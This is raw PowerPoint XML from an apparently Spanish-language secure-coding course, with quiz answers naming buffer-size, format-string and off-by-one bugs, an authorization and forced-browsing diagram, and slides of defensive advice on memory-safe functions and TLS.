          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="15686"/>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2" name="Google Shape;832;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3930237"/>
            <a:ext cx="12192001" cy="325926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="15686"/>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40924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64653-C73E-4CE1-4DEF-92A7295F64C5}"/>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DBA9261-9147-76DF-02DA-4F7B6D33B838}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>bottom.cpp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="6000" dirty="0"/>
              <a:t>(cálculo incorrecto del tamaño del buffer)</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209882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01AF9-3D36-30A8-BC45-6BAD1EE9CC9D}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="842" name="Google Shape;842;p67" descr="Picture 3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="107601"/>
            <a:ext cx="12192000" cy="6537436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="843" name="Google Shape;843;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2318690"/>
            <a:ext cx="12192000" cy="325926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="15686"/>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44" name="Google Shape;844;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5407097"/>
            <a:ext cx="12192000" cy="325926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="15686"/>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71322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F6792-B1A9-FFEC-500B-3FA382FD2CF5}"/>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47FF580-6B2A-7E0E-7EAC-218A34AF59A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>Respuesta: Top</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="6000" dirty="0"/>
              <a:t>(Inyección de formato de String)</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272762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4E6D8-6ACF-95C6-E455-A4DFA373C680}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="854" name="Google Shape;854;p69" descr="Picture 6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="178125"/>
            <a:ext cx="12192001" cy="5832306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="855" name="Google Shape;855;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="2269607"/>
            <a:ext cx="12192001" cy="236621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="28627"/>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56" name="Google Shape;856;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="5161744"/>
            <a:ext cx="12192001" cy="244257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="28627"/>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30114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C3C7-1406-1E4B-AA89-63A52DA31801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2039670" y="423863"/>
            <a:ext cx="8475929" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Autorización  ausente o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>ncorrecta</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D721913-DCA6-2749-BF68-9D3623614B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61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078373" y="1260748"/>
            <a:ext cx="718457" cy="926275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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2039671" y="1337889"/>
            <a:ext cx="718457" cy="872837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2039671" y="2143640"/>
            <a:ext cx="732893" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD39C724-D387-0645-AD03-15F0B8D33AA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006714" y="2187548"/>
            <a:ext cx="861775" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/admin</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2649" y="3688055"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BBC84B-9A44-AD43-915F-EA2939C046D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1914758" y="4640555"/>
            <a:ext cx="891591" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Atacante</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Curved Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71BF70E-D78E-A54F-90D0-4E93C36FAC3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1814967" y="3096905"/>
            <a:ext cx="1175083" cy="7219"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">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6B146178-72F2-974B-BB4F-8808455E4F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2568179" y="1599985"/>
            <a:ext cx="750925" cy="1075049"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30442"/>
              <a:gd name="adj2" fmla="val 67043"/>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6AD4CEB-26B0-0746-B537-EFE45C343400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4083183" y="1531454"/>
            <a:ext cx="802757" cy="1187621"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28477"/>
              <a:gd name="adj2" fmla="val 69559"/>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ED7DDE3-48F9-A349-B146-4C9BC97FFCC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355334" y="2673673"/>
            <a:ext cx="1130438" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Navegación</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Forzada</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CA95741-703D-094F-98A4-B6E2CE2F90A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443" t="2194" r="2456" b="66606"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3481167" y="1298909"/>
            <a:ext cx="718457" cy="926275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02E3FAB9-066A-034C-8859-182C5EC6ED6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3426169" y="2157311"/>
            <a:ext cx="929165" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/limited</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F5C7FC0-C3E0-314C-8A0C-90E558F21C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6323513" y="1962899"/>
            <a:ext cx="5247277" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800"/>
              <a:t>autorización ausente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0"/>
              <a:t>o incorrecta ocurre cuando la aplicación no valida adecuadamente roles y permisos, permitiendo la escalada de privilegios.</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82416946-74E3-B2AD-4B77-38186A3602AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="16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2146747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053C8-8225-44BD-DEAD-470AB4346B9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D1525B5-3B62-0658-E06D-EF03CF274483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="8800" dirty="0"/>
              <a:t>Respuesta: Top</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>(Off by one)</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235577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7AC8E0-303D-82B3-A663-4619877B8D3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="216038"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY"/>
              <a:t>En resumen…</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5CD7AD0-CB84-5FC3-55E4-1E428170A28D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1644650"/>
            <a:ext cx="10515600" cy="4410075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>funciones seguras </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>de memoria permiten limitar el número de bytes a leer dentro del buffer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Incluso utilizando funciones seguras, se debe prestar atención al tamaño especificado, siendo muy importante utilizar constantes para prevenir errores.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>No utilizar entradas de datos en formatos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>strings</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Utilizar el operador &lt;= con cuidado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174742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0FC0-FA93-7B42-98D3-5F6E08D79DEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10585536" cy="1006475"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Asegurando los datos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF9E1B1F-BFAA-4247-AC86-F90A58FEAE7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1575103"/>
            <a:ext cx="10585537" cy="4857012"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GDPR y otras legislaciones sobre protección de datos han puesto sobre la mesa la gestión de la seguridad de los datos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Los datos deben ser transmitidos y almacenados de forma segura.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La criptografía es la piedra angular.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Protocolos seguros: TLS 1.2, TLS 1.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Cifradores seguros: ECDHE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Hashes seguros: SHA-2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Rechazar certificados inválidos, e incluso considere fijar certificados (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pinning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
